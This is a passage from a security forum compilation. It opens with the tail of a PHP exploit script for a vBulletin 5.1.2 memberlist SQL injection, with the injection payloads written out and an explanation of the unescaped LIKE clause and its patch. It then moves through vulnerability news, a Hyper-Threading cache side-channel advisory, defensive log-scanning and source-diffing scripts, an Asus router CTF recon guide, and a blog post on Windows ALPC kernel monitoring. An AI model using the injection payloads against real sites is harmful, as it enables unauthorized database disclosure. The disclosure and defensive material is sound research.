        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),' . $letter . ',1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}

// Get user
print "\r\nUser: ";
$result = httpPost($target_url . '/ajax/render/memberlist_items',
    'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1,1)--+"+' .
    '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
$letter = 1;
while (strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}

// Get database
print "\r\nDatabase: ";
$result = httpPost($target_url . '/ajax/render/memberlist_items',
    'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),1,1)--+"+' .
    '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
$letter = 1;
while (strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),' . $letter . ',1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}

print "\r\n";
?>[/phpcode]

More details:

The query was the following:

SELECT user.userid, user.username, user.usergroupid AS usergroupid, user.lastactivity, user.options, user.posts, user.joindate, user.usertitle, user.reputation, session.lastactivity AS lastvisit, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, infractiongroupid, user.usergroupid FROM user AS user LEFT JOIN session AS session ON session.userid = user.userid WHERE user.username LIKE "[B][COLOR=#ff0000]D[/COLOR][/B]%" GROUP BY user.userid ORDER BY user.username ASC LIMIT 0, 10;

The "D" is the controlled parameter. And the quote (") was NOT escaped. The query was generated with a function from querydefs.php:

public function fetchMemberList($params, $db, $check_only = false)

The vulnerable code:

if (!empty($params['startswith']))
{
    if ($params['startswith'] == '#')
    {
        $where[] = 'user.username REGEXP "^[^a-z].?"';
    }
    else
    {
        $where[] = 'user.username LIKE "' . $params['startswith'] . '%"';
    }
}

And the patch contains the fix:

if (!empty($params['startswith']))
{
    if ($params['startswith'] == '#')
    {
        $where[] = 'user.username REGEXP "^[^a-z].?"';
    }
    else
    {
        $where[] = 'user.username LIKE "' . $db->escape_string_like($params['startswith']) . '%"';
    }
}

So now the value is escaped and the SQL Injection is fixed. The vBulletin team moved really fast in fixing this problem.

More info: https://rstforums.com/forum/86951-rst-vbulletin-5-1-2-sql-injection.rst
-
https://code.google.com/p/torchat/
-
Let's see you do 10 reviews. Until then, a category like that is out of the question, especially since it has nothing to do with IT security. I'm being ironic, don't try to write one, because there is nothing to write in a "program review". And it doesn't help anyone.
-
Buy some sachets. You'll see that some of them are plant chemicals. The ingredients may be listed there.
-
So that everyone understands: we don't create new categories unless there are already at least 100 topics that would fit into that category.
-
I haven't seen A SINGLE review around here. So no.
-
Flaws found in Bitdefender enterprise endpoint manager

Hardcoded GravityZone creds to be wiped at month's end

By Darren Pauli, 17 Jul 2014

Holes have been reported in Bitdefender's Gravity end-point protection platform that allow hackers to target corporate infrastructure. Researcher Stefan Viehbock of SEC Consult Vulnerability Lab said the flaw affecting the latest version provided an entry point for attackers to move laterally through the network.

"Attackers are able to completely compromise the Bitdefender GravityZone solution as they can gain system and database level access," Viehbock said in an advisory. "Furthermore attackers can manage all endpoints."

Gravity contained three vulnerabilities, two of which were patched, including an unauthenticated local file disclosure in the platform's web console and update server that allowed attackers to read arbitrary files - including cleartext passwords - "from the filesystem with the privileges of the nginx operating system user." Bitdefender also patched missing authentication for particular scripts in the web user interface that granted attackers access to admin functions.

A remaining flaw meant the MongoDB database could be accessed and configuration data altered using hardcoded username and password credentials that users could not change. The security vendor planned to patch the remaining flaw at the end of the month. Security researchers recommended customers stop using the platform until a patch was released and a "thorough security review" was performed by security pros.

Source: Flaws found in Bitdefender enterprise endpoint manager • The Register
-
Hyper-Threading Considered Harmful

Hyper-Threading, as currently implemented on Intel Pentium Extreme Edition, Pentium 4, Mobile Pentium 4, and Xeon processors, suffers from a serious security flaw. This flaw permits local information disclosure, including allowing an unprivileged user to steal an RSA private key being used on the same machine. Administrators of multi-user systems are strongly advised to take action to disable Hyper-Threading immediately; single-user systems (i.e., desktop computers) are not affected.

I presented details of how to exploit this security flaw at BSDCan 2005 in Ottawa on May 13th, 2005. For those who were unable to attend my talk, I have written a 12-page paper, Cache Missing for Fun and Profit, discussing this flaw and related problems, both realized and theoretical.

Vendor statements

The following statements have either been provided to me by vendors or quoted from vendor advisories:

CVE: The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-0109 to the problem of information disclosure resulting from cache evictions in simultaneous multithreading processors. This is a candidate for inclusion in the CVE list, which standardizes names for security problems.

FreeBSD: This issue affects FreeBSD/i386 and FreeBSD/amd64, and is addressed in advisory FreeBSD-SA-05:09.htt.

NetBSD: The NetBSD Security-Officer Team believes that workarounds will be suitable for the majority of our users. Since this issue is a complex one, the 'right' solution will require a larger discussion which is only possible once this issue is public. This issue will be addressed in advisory NetBSD-SA2005-001, which will provide a list of workarounds for use until the 'final' conclusion is reached.

OpenBSD: OpenBSD does not directly support hyperthreading at this time, therefore no patch is available. Affected users may disable hyperthreading in their system BIOS. We will revisit this issue when hyperthreading support is improved.
RedHat: Updated OpenSSL packages that fix security issues are now available [...] The OpenSSL library has been patched to add a new fixed-window mod_exp implementation as default for RSA, DSA, and DH private-key operations. This patch is designed to mitigate cache timing and potentially related attacks.
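The fixed-window technique named in the RedHat statement, as an added illustration (this is not OpenSSL's implementation): plain square-and-multiply issues a multiply only for set exponent bits, so its operation sequence spells out the key, whereas the fixed-window version performs the same squarings, the same full table scan and the same multiply for every window regardless of the exponent's value. Python integers are not constant-time; only the recorded access pattern is the point.

```python
"""Fixed-window modular exponentiation versus plain square-and-multiply.

Added illustration of the mitigation named in the RedHat statement above;
it is not OpenSSL's code. Python big-integer arithmetic is not constant-time,
so what this shows is only the *sequence of table reads and multiplies*,
which is what a cache-eviction side channel on a Hyper-Threaded sibling
would observe.
"""


def square_and_multiply(base, exp, mod, trace=None):
    """Left-to-right binary exponentiation. A multiply is issued only for
    set bits, so the recorded operation sequence leaks the exponent."""
    result = 1
    for i in range(exp.bit_length() - 1, -1, -1):
        result = result * result % mod
        if trace is not None:
            trace.append("square")
        if (exp >> i) & 1:
            result = result * base % mod
            if trace is not None:
                trace.append("multiply")
    return result


def _select(table, idx, trace=None):
    """Fetch table[idx] by touching every entry and keeping the wanted one
    through a mask, so the set of locations read does not depend on idx."""
    chosen = 0
    for j, entry in enumerate(table):
        mask = -(j == idx)          # -1 (all bits set) for the wanted entry, else 0
        chosen |= entry & mask
        if trace is not None:
            trace.append("read table[%d]" % j)
    return chosen


def fixed_window_modexp(base, exp, mod, exp_bits=None, window=4, trace=None):
    """Fixed-window exponentiation. exp_bits is the nominal exponent length
    (for RSA, the modulus size); the number of windows, squarings, table scans
    and multiplies depends on exp_bits and window only, never on exp itself."""
    if exp_bits is None:
        exp_bits = mod.bit_length()
    if exp.bit_length() > exp_bits:
        raise ValueError("exponent longer than exp_bits")
    # Precompute base^0 .. base^(2^window - 1).
    table = [1]
    for _ in range(1, 1 << window):
        table.append(table[-1] * base % mod)
    nwindows = (exp_bits + window - 1) // window
    result = 1
    for w in range(nwindows - 1, -1, -1):
        for _ in range(window):                      # always `window` squarings
            result = result * result % mod
            if trace is not None:
                trace.append("square")
        digit = (exp >> (w * window)) & ((1 << window) - 1)
        result = result * _select(table, digit, trace) % mod   # always one multiply
        if trace is not None:
            trace.append("multiply")
    return result


def access_pattern(func, exp, **kwargs):
    """Return the operation trace func emits for exp (small fixed base/modulus)."""
    trace = []
    func(7, exp, 1000003, trace=trace, **kwargs)
    return trace
```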
-
Five Vulnerabilities Fixed in Apache Web Server

by Dennis Fisher

There are five vulnerabilities fixed in the latest release of the Apache Web server, including a buffer overflow and several denial-of-service vulnerabilities. Fixes for these flaws have landed in the developer release of the server, 2.4.10-dev.

The buffer overflow vulnerability is rated moderate by the Apache Software Foundation, but it could be used for remote code execution under the right circumstances. The flaw lies in the way that Apache handles updating the mod_status component. It’s caused by a race condition, and an attacker can exploit it without authentication.

“The specific flaw exists within the updating of mod_status. A race condition in mod_status allows an attacker to disclose information or corrupt memory with several requests to endpoints with handler server-status and other endpoints. By abusing this flaw, an attacker can possibly disclose credentials or leverage this situation to achieve remote code execution,” says the advisory from HP’s Zero Day Initiative, which reported the vulnerability to Apache on behalf of the researcher who discovered it, Marek Kroemeke.

Apache’s advisory says that an attacker would need the right conditions in order to exploit this vulnerability.

“An attacker able to access a public server status page on a server using a threaded MPM could send a carefully crafted request which could lead to a heap buffer overflow. Note that it is not a default or recommended configuration to have a public accessible server status page,” Apache’s advisory says.

Along with the buffer overflow, there are four DoS vulnerabilities fixed in 2.4.10. Two of those vulnerabilities are rated important and the other two are considered moderate risks.

Source: Five Vulnerabilities Fixed in Apache Web Server | Threatpost | The first stop for security news
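Since the precondition above is a publicly reachable server-status page hit with several requests, one defensive check is to look for exactly that in the access log. Added example, not code from the advisory or the article: it parses constructed combined-format log lines, flags server-status requests from outside an assumed set of allowed networks, and reports sources that were served the page repeatedly.

```python
"""Detection pass over Apache access logs: flag requests for the server-status
handler from outside the networks expected to reach it, and note sources that
were served it repeatedly, since the mod_status race needs several requests.

Added example, not code from the Apache advisory or the Threatpost article.
The log lines are constructed (Apache "combined" format, documentation
address ranges) and ALLOWED_NETWORKS is an assumption about where an admin
would legitimately poll the page from.
"""
import ipaddress
import re
from collections import Counter

# Constructed sample log lines.
SAMPLE_LOG = """\
127.0.0.1 - - [17/Jul/2014:10:00:01 +0000] "GET /server-status HTTP/1.1" 200 4123 "-" "curl/7.35.0"
203.0.113.7 - - [17/Jul/2014:10:00:02 +0000] "GET /server-status?auto HTTP/1.1" 200 4123 "-" "python-requests/2.3"
203.0.113.7 - - [17/Jul/2014:10:00:02 +0000] "GET /server-status?auto HTTP/1.1" 200 4123 "-" "python-requests/2.3"
203.0.113.7 - - [17/Jul/2014:10:00:03 +0000] "GET /server-status?auto HTTP/1.1" 200 4123 "-" "python-requests/2.3"
10.10.0.5 - - [17/Jul/2014:10:00:04 +0000] "GET /server-status HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Jul/2014:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 1543 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Jul/2014:10:00:06 +0000] "GET /server-status HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

# Assumption: localhost and one management subnet may poll the status page.
ALLOWED_NETWORKS = [ipaddress.ip_network("127.0.0.0/8"),
                    ipaddress.ip_network("10.10.0.0/16")]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_allowed(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ALLOWED_NETWORKS)


def external_status_hits(log_text, burst_threshold=3):
    """Return (hits, bursts).

    hits   : (ip, path, status) for every server-status request from a
             non-allowed source, whatever Apache answered;
    bursts : sources that were served the page (200) at least
             burst_threshold times, the repeated-request pattern the
             advisory describes.
    """
    hits = []
    served = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0].rstrip("/")
        if path != "/server-status" or is_allowed(rec["ip"]):
            continue
        hits.append((rec["ip"], rec["path"], rec["status"]))
        if rec["status"] == "200":
            served[rec["ip"]] += 1
    bursts = sorted(ip for ip, n in served.items() if n >= burst_threshold)
    return hits, bursts


if __name__ == "__main__":
    found, repeat = external_status_hits(SAMPLE_LOG)
    for hit in found:
        print("external server-status request:", hit)
    print("repeated sources:", repeat)
```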
-
[h=3]Hacking Asus RT-AC66U and Preparing for SOHOpelesslyBroken CTF[/h]

So it's finally July, time to pack for DEFCON, follow @defconparties on Twitter and decide which villages to visit and which talks to attend. There's a new hacking competition this year called SOHOpelesslyBroken, presented by ISE and EFF. The objective on Track 0 is to demonstrate previously unidentified vulnerabilities in off-the-shelf consumer wireless routers. Track 1 will hold a live CTF for the duration of DEFCON. CTFs are always fun and this contest involves hacking real embedded devices, which makes it even more fun.

(Image caption: Yes, that's my workstation =P)

I'm particularly interested in the EFF Open Wireless Router, but they haven't disclosed details about the device yet. According to the event rules, the ASUS RT-AC66U (HW Ver. A2) [Version 3.0.0.4.266] is one of the possible targets. As I had a spare RT-AC66U at home, I decided to write a quick guide for everyone interested in participating in this competition CTF.

recon

The first thing to do is to find the firmware and its source code. Fortunately, the Asus RT-AC66U is GPL'ed and we can easily find its source online. The version used for the contest is an old one, from 2012. In order to perform a better analysis, we are going to grab the sources and the firmware from v3.0.0.4.266 and v3.0.0.4.376.1123 (the most recent one as of this writing).

Asus RT-AC66u v3.0.0.4.266 - Firmware
Asus RT-AC66u v3.0.0.4.266 - Source Code
Asus RT-AC66u v3.0.0.4.376.1123 - Firmware
Asus RT-AC66u v3.0.0.4.376.1123 - Source Code

Many firmware versions were published between these two releases; we can review the changelogs to find security issues: http://www.asus.com/Networking/RTAC66U/HelpDesk_Download

According to the rules, we have to identify and exploit a 0-day vulnerability.
We can combine different flaws with known issues in order to score points. If the vendor has silently patched an issue and you create an exploit for it, that should be scored as a valid 0-day (I'm not going to start discussing terminology here).

Now that we have the source code, it's time to extract and audit it. The CTF Field Guide from Trail of Bits has some good resources on Auditing Source Code. You can use tools like Beyond Compare, Araxis Merge and WinMerge on Windows platforms, or Meld if you're more of a Linux user. Let's focus on the "/asuswrt/release/src/router/" directory, comparing these two folders using Meld:

There are many security advisories for this router: if you want to find 0-days you should look for disclosed vulnerabilities and exploits to avoid duplicates (believe me, this is the hardest part). Some references:

ASUS RT-AC66U Remote Root (Broadcom ACSD)
ASUS RT-N66U Router - HTTPS Directory traversal and full file access and credential disclosure vuln
Asus RT56U Remote Command Injection
Taking over the ASUS RT-N56U and RT-AC66U
Dear Asus router user: You’ve been pwned, thanks to easily exploited flaw (Asusgate)
OSVDB

Points are deducted from your score if your exploits require special system configurations and specific information. If you want to score lots of points, you should be targeting default services and processes. The USB application tab on the RT-AC66U allows the user to set up a series of services like FTP, DLNA, NFS and Samba:

MiniDLNA is also a nice target. It should be pretty easy to find vulns for the service using Zachary Cutlip's research, as he broke it multiple times. Another potentially vulnerable service is AiCloud: it links your home network to an online Web storage service and lets you access it through a mobile application:

Full article: w00tsec: Hacking Asus RT-AC66U and Preparing for SOHOpelesslyBroken CTF
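The release-to-release comparison described above, done with Meld in the post, as a scriptable added example that is not part of the original post and not Asus' code: it walks two source trees, reports what changed, and pulls out the changed lines that touch a watch list of risky C calls (the list is an assumption), which is where a silently patched fix usually shows up. The two trees are constructed in a temporary directory.

```python
"""Scriptable version of the release-to-release source comparison: list what
changed between two firmware source trees and pull out changed lines that
touch risky C calls, where a silently patched bug usually shows up.

Added example; the two trees are constructed below in a temp directory and
are not Asus' code. WATCHED_CALLS is an assumption, not part of the post.
"""
import difflib
import os
import tempfile

# Assumption: calls worth a second look when a release changes them.
WATCHED_CALLS = ("strcpy", "strcat", "sprintf", "gets", "system", "popen")


def _path(root, rel):
    return os.path.join(root, *rel.split("/"))


def _read(root, rel):
    with open(_path(root, rel), encoding="utf-8", errors="replace") as fh:
        return fh.read().splitlines()


def _listing(root):
    files = set()
    for dirpath, _, names in os.walk(root):
        for name in names:
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            files.add(rel.replace(os.sep, "/"))
    return files


def changed_files(old_root, new_root):
    """Return (modified, added, removed) as sorted lists of '/'-separated paths."""
    old, new = _listing(old_root), _listing(new_root)
    modified = sorted(rel for rel in old & new
                      if _read(old_root, rel) != _read(new_root, rel))
    return modified, sorted(new - old), sorted(old - new)


def risky_changes(old_root, new_root):
    """Map each modified file to its added/removed lines that call a watched function."""
    findings = {}
    modified, _, _ = changed_files(old_root, new_root)
    for rel in modified:
        diff = difflib.unified_diff(_read(old_root, rel), _read(new_root, rel),
                                    lineterm="", n=0)
        lines = [line for line in diff
                 if line[:1] in "+-"
                 and not line.startswith(("+++", "---"))
                 and any(call + "(" in line for call in WATCHED_CALLS)]
        if lines:
            findings[rel] = lines
    return findings


def _write(root, rel, lines):
    path = _path(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(lines) + "\n")


def build_sample_trees():
    """Construct two tiny stand-in 'releases' (not real firmware) and return their roots."""
    base = tempfile.mkdtemp(prefix="fw_")
    old_root = os.path.join(base, "v3.0.0.4.266")
    new_root = os.path.join(base, "v3.0.0.4.376.1123")
    httpd = "release/src/router/httpd/"
    web_old = ["int handle(char *in) {", "    char buf[64];",
               "    strcpy(buf, in);      /* no bounds check */",
               "    return 0;", "}"]
    web_new = web_old[:2] + ["    strlcpy(buf, in, sizeof(buf));"] + web_old[3:]
    cgi_old = ["void run(char *cmd) {", "    system(cmd);", "}"]
    cgi_new = ["void run(char *cmd) {", "    if (sanitize(cmd)) system(cmd);", "}"]
    makefile = ["all:", "\t$(CC) -o httpd web.c cgi.c"]   # identical in both releases
    for root in (old_root, new_root):
        _write(root, httpd + "Makefile", makefile)
    _write(old_root, httpd + "web.c", web_old)
    _write(new_root, httpd + "web.c", web_new)
    _write(old_root, httpd + "cgi.c", cgi_old)
    _write(new_root, httpd + "cgi.c", cgi_new)
    _write(new_root, httpd + "aicloud.c", ["/* file added in the newer release */"])
    return old_root, new_root


if __name__ == "__main__":
    old, new = build_sample_trees()
    print("modified/added/removed:", changed_files(old, new))
    for rel, lines in risky_changes(old, new).items():
        print(rel)
        for line in lines:
            print("   ", line)
```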
-
[h=2]ALPC monitoring[/h]

Posted by zer0mem on July 15, 2014

Microsoft did nice work on the callback mechanism, to avoid nasty patching across the kernel and to support monitoring in a clean way. Currently we can use, among others, callbacks on loading a new image, process and thread creation, opening and duplicating handles, dropping files, etc. For monitoring network communication you can attach to some device drivers, which is cleaner than hooking, but still does not cover as much as I want. And there comes ALPC, because even resolving a host goes through it, and when you are able to recognize it .. http://mba.shengwushibie.com/itbook/BookChapter.asp?id=28217

In April I attended an awesome training at Syscan, led by Alex Ionescu. Among a lot of deep kernel stuff, the ALPC mechanism was covered in depth, which is the point of this blog post. A nice presentation about ALPC, which I really recommend reading: All about the RPC, LRPC, ALPC, and LPC in your PC

Starting with a little windbg script:

[CODE]
r? @$t6 = (nt!_LIST_ENTRY*)@@(nt!PsActiveProcessHead)
.for (r? @$t7 = @$t6->Flink; (@$t6 != @$t7); r? @$t7 = @$t7->Flink)
{
    r? @$t8 = #CONTAINING_RECORD(@$t7, nt!_EPROCESS, ActiveProcessLinks)
    r? @$t0 = (nt!_LIST_ENTRY*)@@(nt!AlpcpPortList)
    .for (r? @$t1 = @$t0->Flink; (@$t0 != @$t1); r? @$t1 = @$t1->Flink)
    {
        r? @$t2 = #CONTAINING_RECORD(@$t1, nt!_ALPC_PORT, PortListEntry)
        .if (@@(@$t8) == @@(@$t2->OwnerProcess))
        {
            .if @@(@$t2->CommunicationInfo->ConnectionPort)
            {
                .printf /D "<link cmd=\"!alpc /p @$t2\">Server Port Info</link> <-> ";
                .printf /D "<link cmd=\"!alpc /p @@(@$t2->CommunicationInfo->ConnectionPort)\">Connection Port Info</link> | ";
                .printf "%10ma (%0.4x) <- ", @@(@$t2->OwnerProcess->ImageFileName), @@(@$t2->OwnerProcess->UniqueProcessId)
                .printf "%10ma (%0.4x)\n", @@(@$t2->CommunicationInfo->ConnectionPort->OwnerProcess->ImageFileName), @@(@$t2->CommunicationInfo->ConnectionPort->OwnerProcess->UniqueProcessId)
                .break
            }
        }
    }
}
[/CODE]
That shows one interesting thing about ALPC, which I like the most:

[CODE]
Server Port Info <-> Connection Port Info | svchost.exe (03f4) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | svchost.exe (0138) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | svchost.exe (03f0) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | atieclxx.exe (048c) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | svchost.exe (04e0) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | spoolsv.exe (058c) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | svchost.exe (05a8) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | armsvc.exe (0610) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | svchost.exe (062c) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | logonsetsvc.ex (0664) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | sqlwriter.exe (06d8) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | svchost.exe (06ec) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | ThinkPadKBSvc. (0710) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | WLIDSVC.EXE (0738) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | logonset.exe (04a4) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | WLIDSVCM.EXE (05f4) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | svchost.exe (0870) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | taskhost.exe (092c) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | dwm.exe (098c) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | explorer.exe (099c) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | MainCpl.exe (0aa4) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | osd.exe (0aac) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | unsecapp.exe (0b48) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | WmiPrvSE.exe (0bd8) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | wmpnetwk.exe (0bd4) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | svchost.exe (0c6c) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | chrome.exe (0ce8) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | Far.exe (0d08) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | conhost.exe (0d10) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | chrome.exe (0d7c) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | chrome.exe (0e10) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | HScrollFun.exe (0f98) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | SetSpeed.exe (0fa4) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | netsession_win (0fcc) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | flux.exe (0fd4) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | AdobeARM.exe (083c) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | netsession_win (0c5c) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | sppsvc.exe (11f8) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | svchost.exe (1290) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | chrome.exe (0a14) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | taskhost.exe (11c4) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | devenv.exe (0494) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | chrome.exe (0134) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | TrustedInstall (0cd0) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | dllhost.exe (0cdc) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | chrome.exe (14e8) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | mscorsvw.exe (1760) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | mscorsvw.exe (17d4) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | notepad.exe (1668) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | Far.exe (11b4) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | conhost.exe (0238) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | SearchIndexer. (16cc) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | windbg.exe (008c) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | wuauclt.exe (085c) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | notepad.exe (1624) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | audiodg.exe (03c4) <- csrss.exe (0170)
Server Port Info <-> Connection Port Info | vmmon64.exe (1434) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | VirtualBox.exe (0b1c) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | VBoxSVC.exe (0b60) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | VirtualBox.exe (029c) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | windbg.exe (0fc0) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | vcpkgsrv.exe (13e4) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | AcroRd32.exe (0a94) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | AcroRd32.exe (125c) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | chrome.exe (0864) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | chrome.exe (1414) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | chrome.exe (1604) <- csrss.exe (01c8)
Server Port Info <-> Connection Port Info | chrome.exe (11a0) <- csrss.exe (01c8)
[/CODE]

-> everyone likes ALPC. And especially applications with network communication, because, as was said at the training, even gethostbyname ends up calling some ALPC!
So I think a really good starting point is the object type responsible for this communication:

[CODE]
   +0x000 TypeList         : _LIST_ENTRY [ 0xffffe001`170b9e00 - 0xffffe001`170b9e00 ]
   +0x010 Name             : _UNICODE_STRING "ALPC Port"
   +0x020 DefaultObject    : 0x00000000`000000e1 Void
   +0x028 Index            : 0x26 '&'
   +0x02c TotalNumberOfObjects : 0x3bc
   +0x030 TotalNumberOfHandles : 0x3ae
   +0x034 HighWaterNumberOfObjects : 0x4d1
   +0x038 HighWaterNumberOfHandles : 0x4c0
   +0x040 TypeInfo         : _OBJECT_TYPE_INITIALIZER
   +0x0b8 TypeLock         : _EX_PUSH_LOCK
   +0x0c0 Key              : 0x43504c41
   +0x0c8 CallbackList     : _LIST_ENTRY [ 0xffffe001`170b9ec8 - 0xffffe001`170b9ec8 ]
[/CODE]

And because nt!_ALPC_PORT objects have their own nt!_OBJECT_TYPE, this gives us the opportunity to attach to it by Ob filtering, and it seems it is really possible. But at the same time, filtering objects comes with some limitations:

Operations
OB_OPERATION_HANDLE_CREATE – A new process handle or thread handle was or will be opened.
OB_OPERATION_HANDLE_DUPLICATE – A process handle or thread handle was or will be duplicated.

That basically means that we are theoretically able to get called on the two mentioned HANDLE operations. That's good, but we want to get more ..
After some digging in nt!_ALPC_PORT it is possible to spot a nice structure:

[CODE]
nt!_ALPC_PORT
   +0x030 CompletionPacketLookaside :
      +0x038 Entry : [1]
         +0x000 ListEntry : _SINGLE_LIST_ENTRY
         +0x008 Packet    : 0xffffe001`18a85150 _IO_MINI_COMPLETION_PACKET_USER
         +0x010 Lookaside : 0xffffe001`18ca16c0 _ALPC_COMPLETION_PACKET_LOOKASIDE

lkd> dt 0xffffe001`18a85150 _IO_MINI_COMPLETION_PACKET_USER
ntdll!_IO_MINI_COMPLETION_PACKET_USER
   +0x000 ListEntry            : _LIST_ENTRY [ 0x00000000`00000000 - 0xffffe001`182c0658 ]
   +0x010 PacketType           : 0x5c0004
   +0x018 KeyContext           : 0x000000f8`3daa8b20 Void
   +0x020 ApcContext           : (null)
   +0x028 IoStatus             : 0n0
   +0x030 IoStatusInformation  : 0
   +0x038 MiniPacketCallback   : 0xfffff801`75c6b61c void nt!AlpcpLookasidePacketCallbackRoutine+0
   +0x040 Context              : 0xffffe001`18ca16f8 Void
   +0x048 Allocated            : 0x1 ''
[/CODE]

So let's take a look at a subset of the nt functions responsible for playing with ALPC:

[CODE]
lkd> x nt!nt*alpc*port
fffff801`760b1e34 nt!NtAlpcCreatePort (<no parameter info>)
fffff801`76059204 nt!NtAlpcAcceptConnectPort (<no parameter info>)
fffff801`76055ab4 nt!NtAlpcDisconnectPort (<no parameter info>)
fffff801`7602e3c0 nt!NtAlpcSendWaitReceivePort (<no parameter info>)
fffff801`76074de8 nt!NtAlpcConnectPort (<no parameter info>)
fffff801`75fe9030 nt!NtAlpcImpersonateClientOfPort (<no parameter info>)

lkd> x nt!alpc*port
fffff801`76056330 nt!AlpcpClosePort (<no parameter info>)
fffff801`76093dc8 nt!AlpcpDispatchReplyToPort (<no parameter info>)
fffff801`75feacd0 nt!AlpcpReferenceConnectedPort (<no parameter info>)
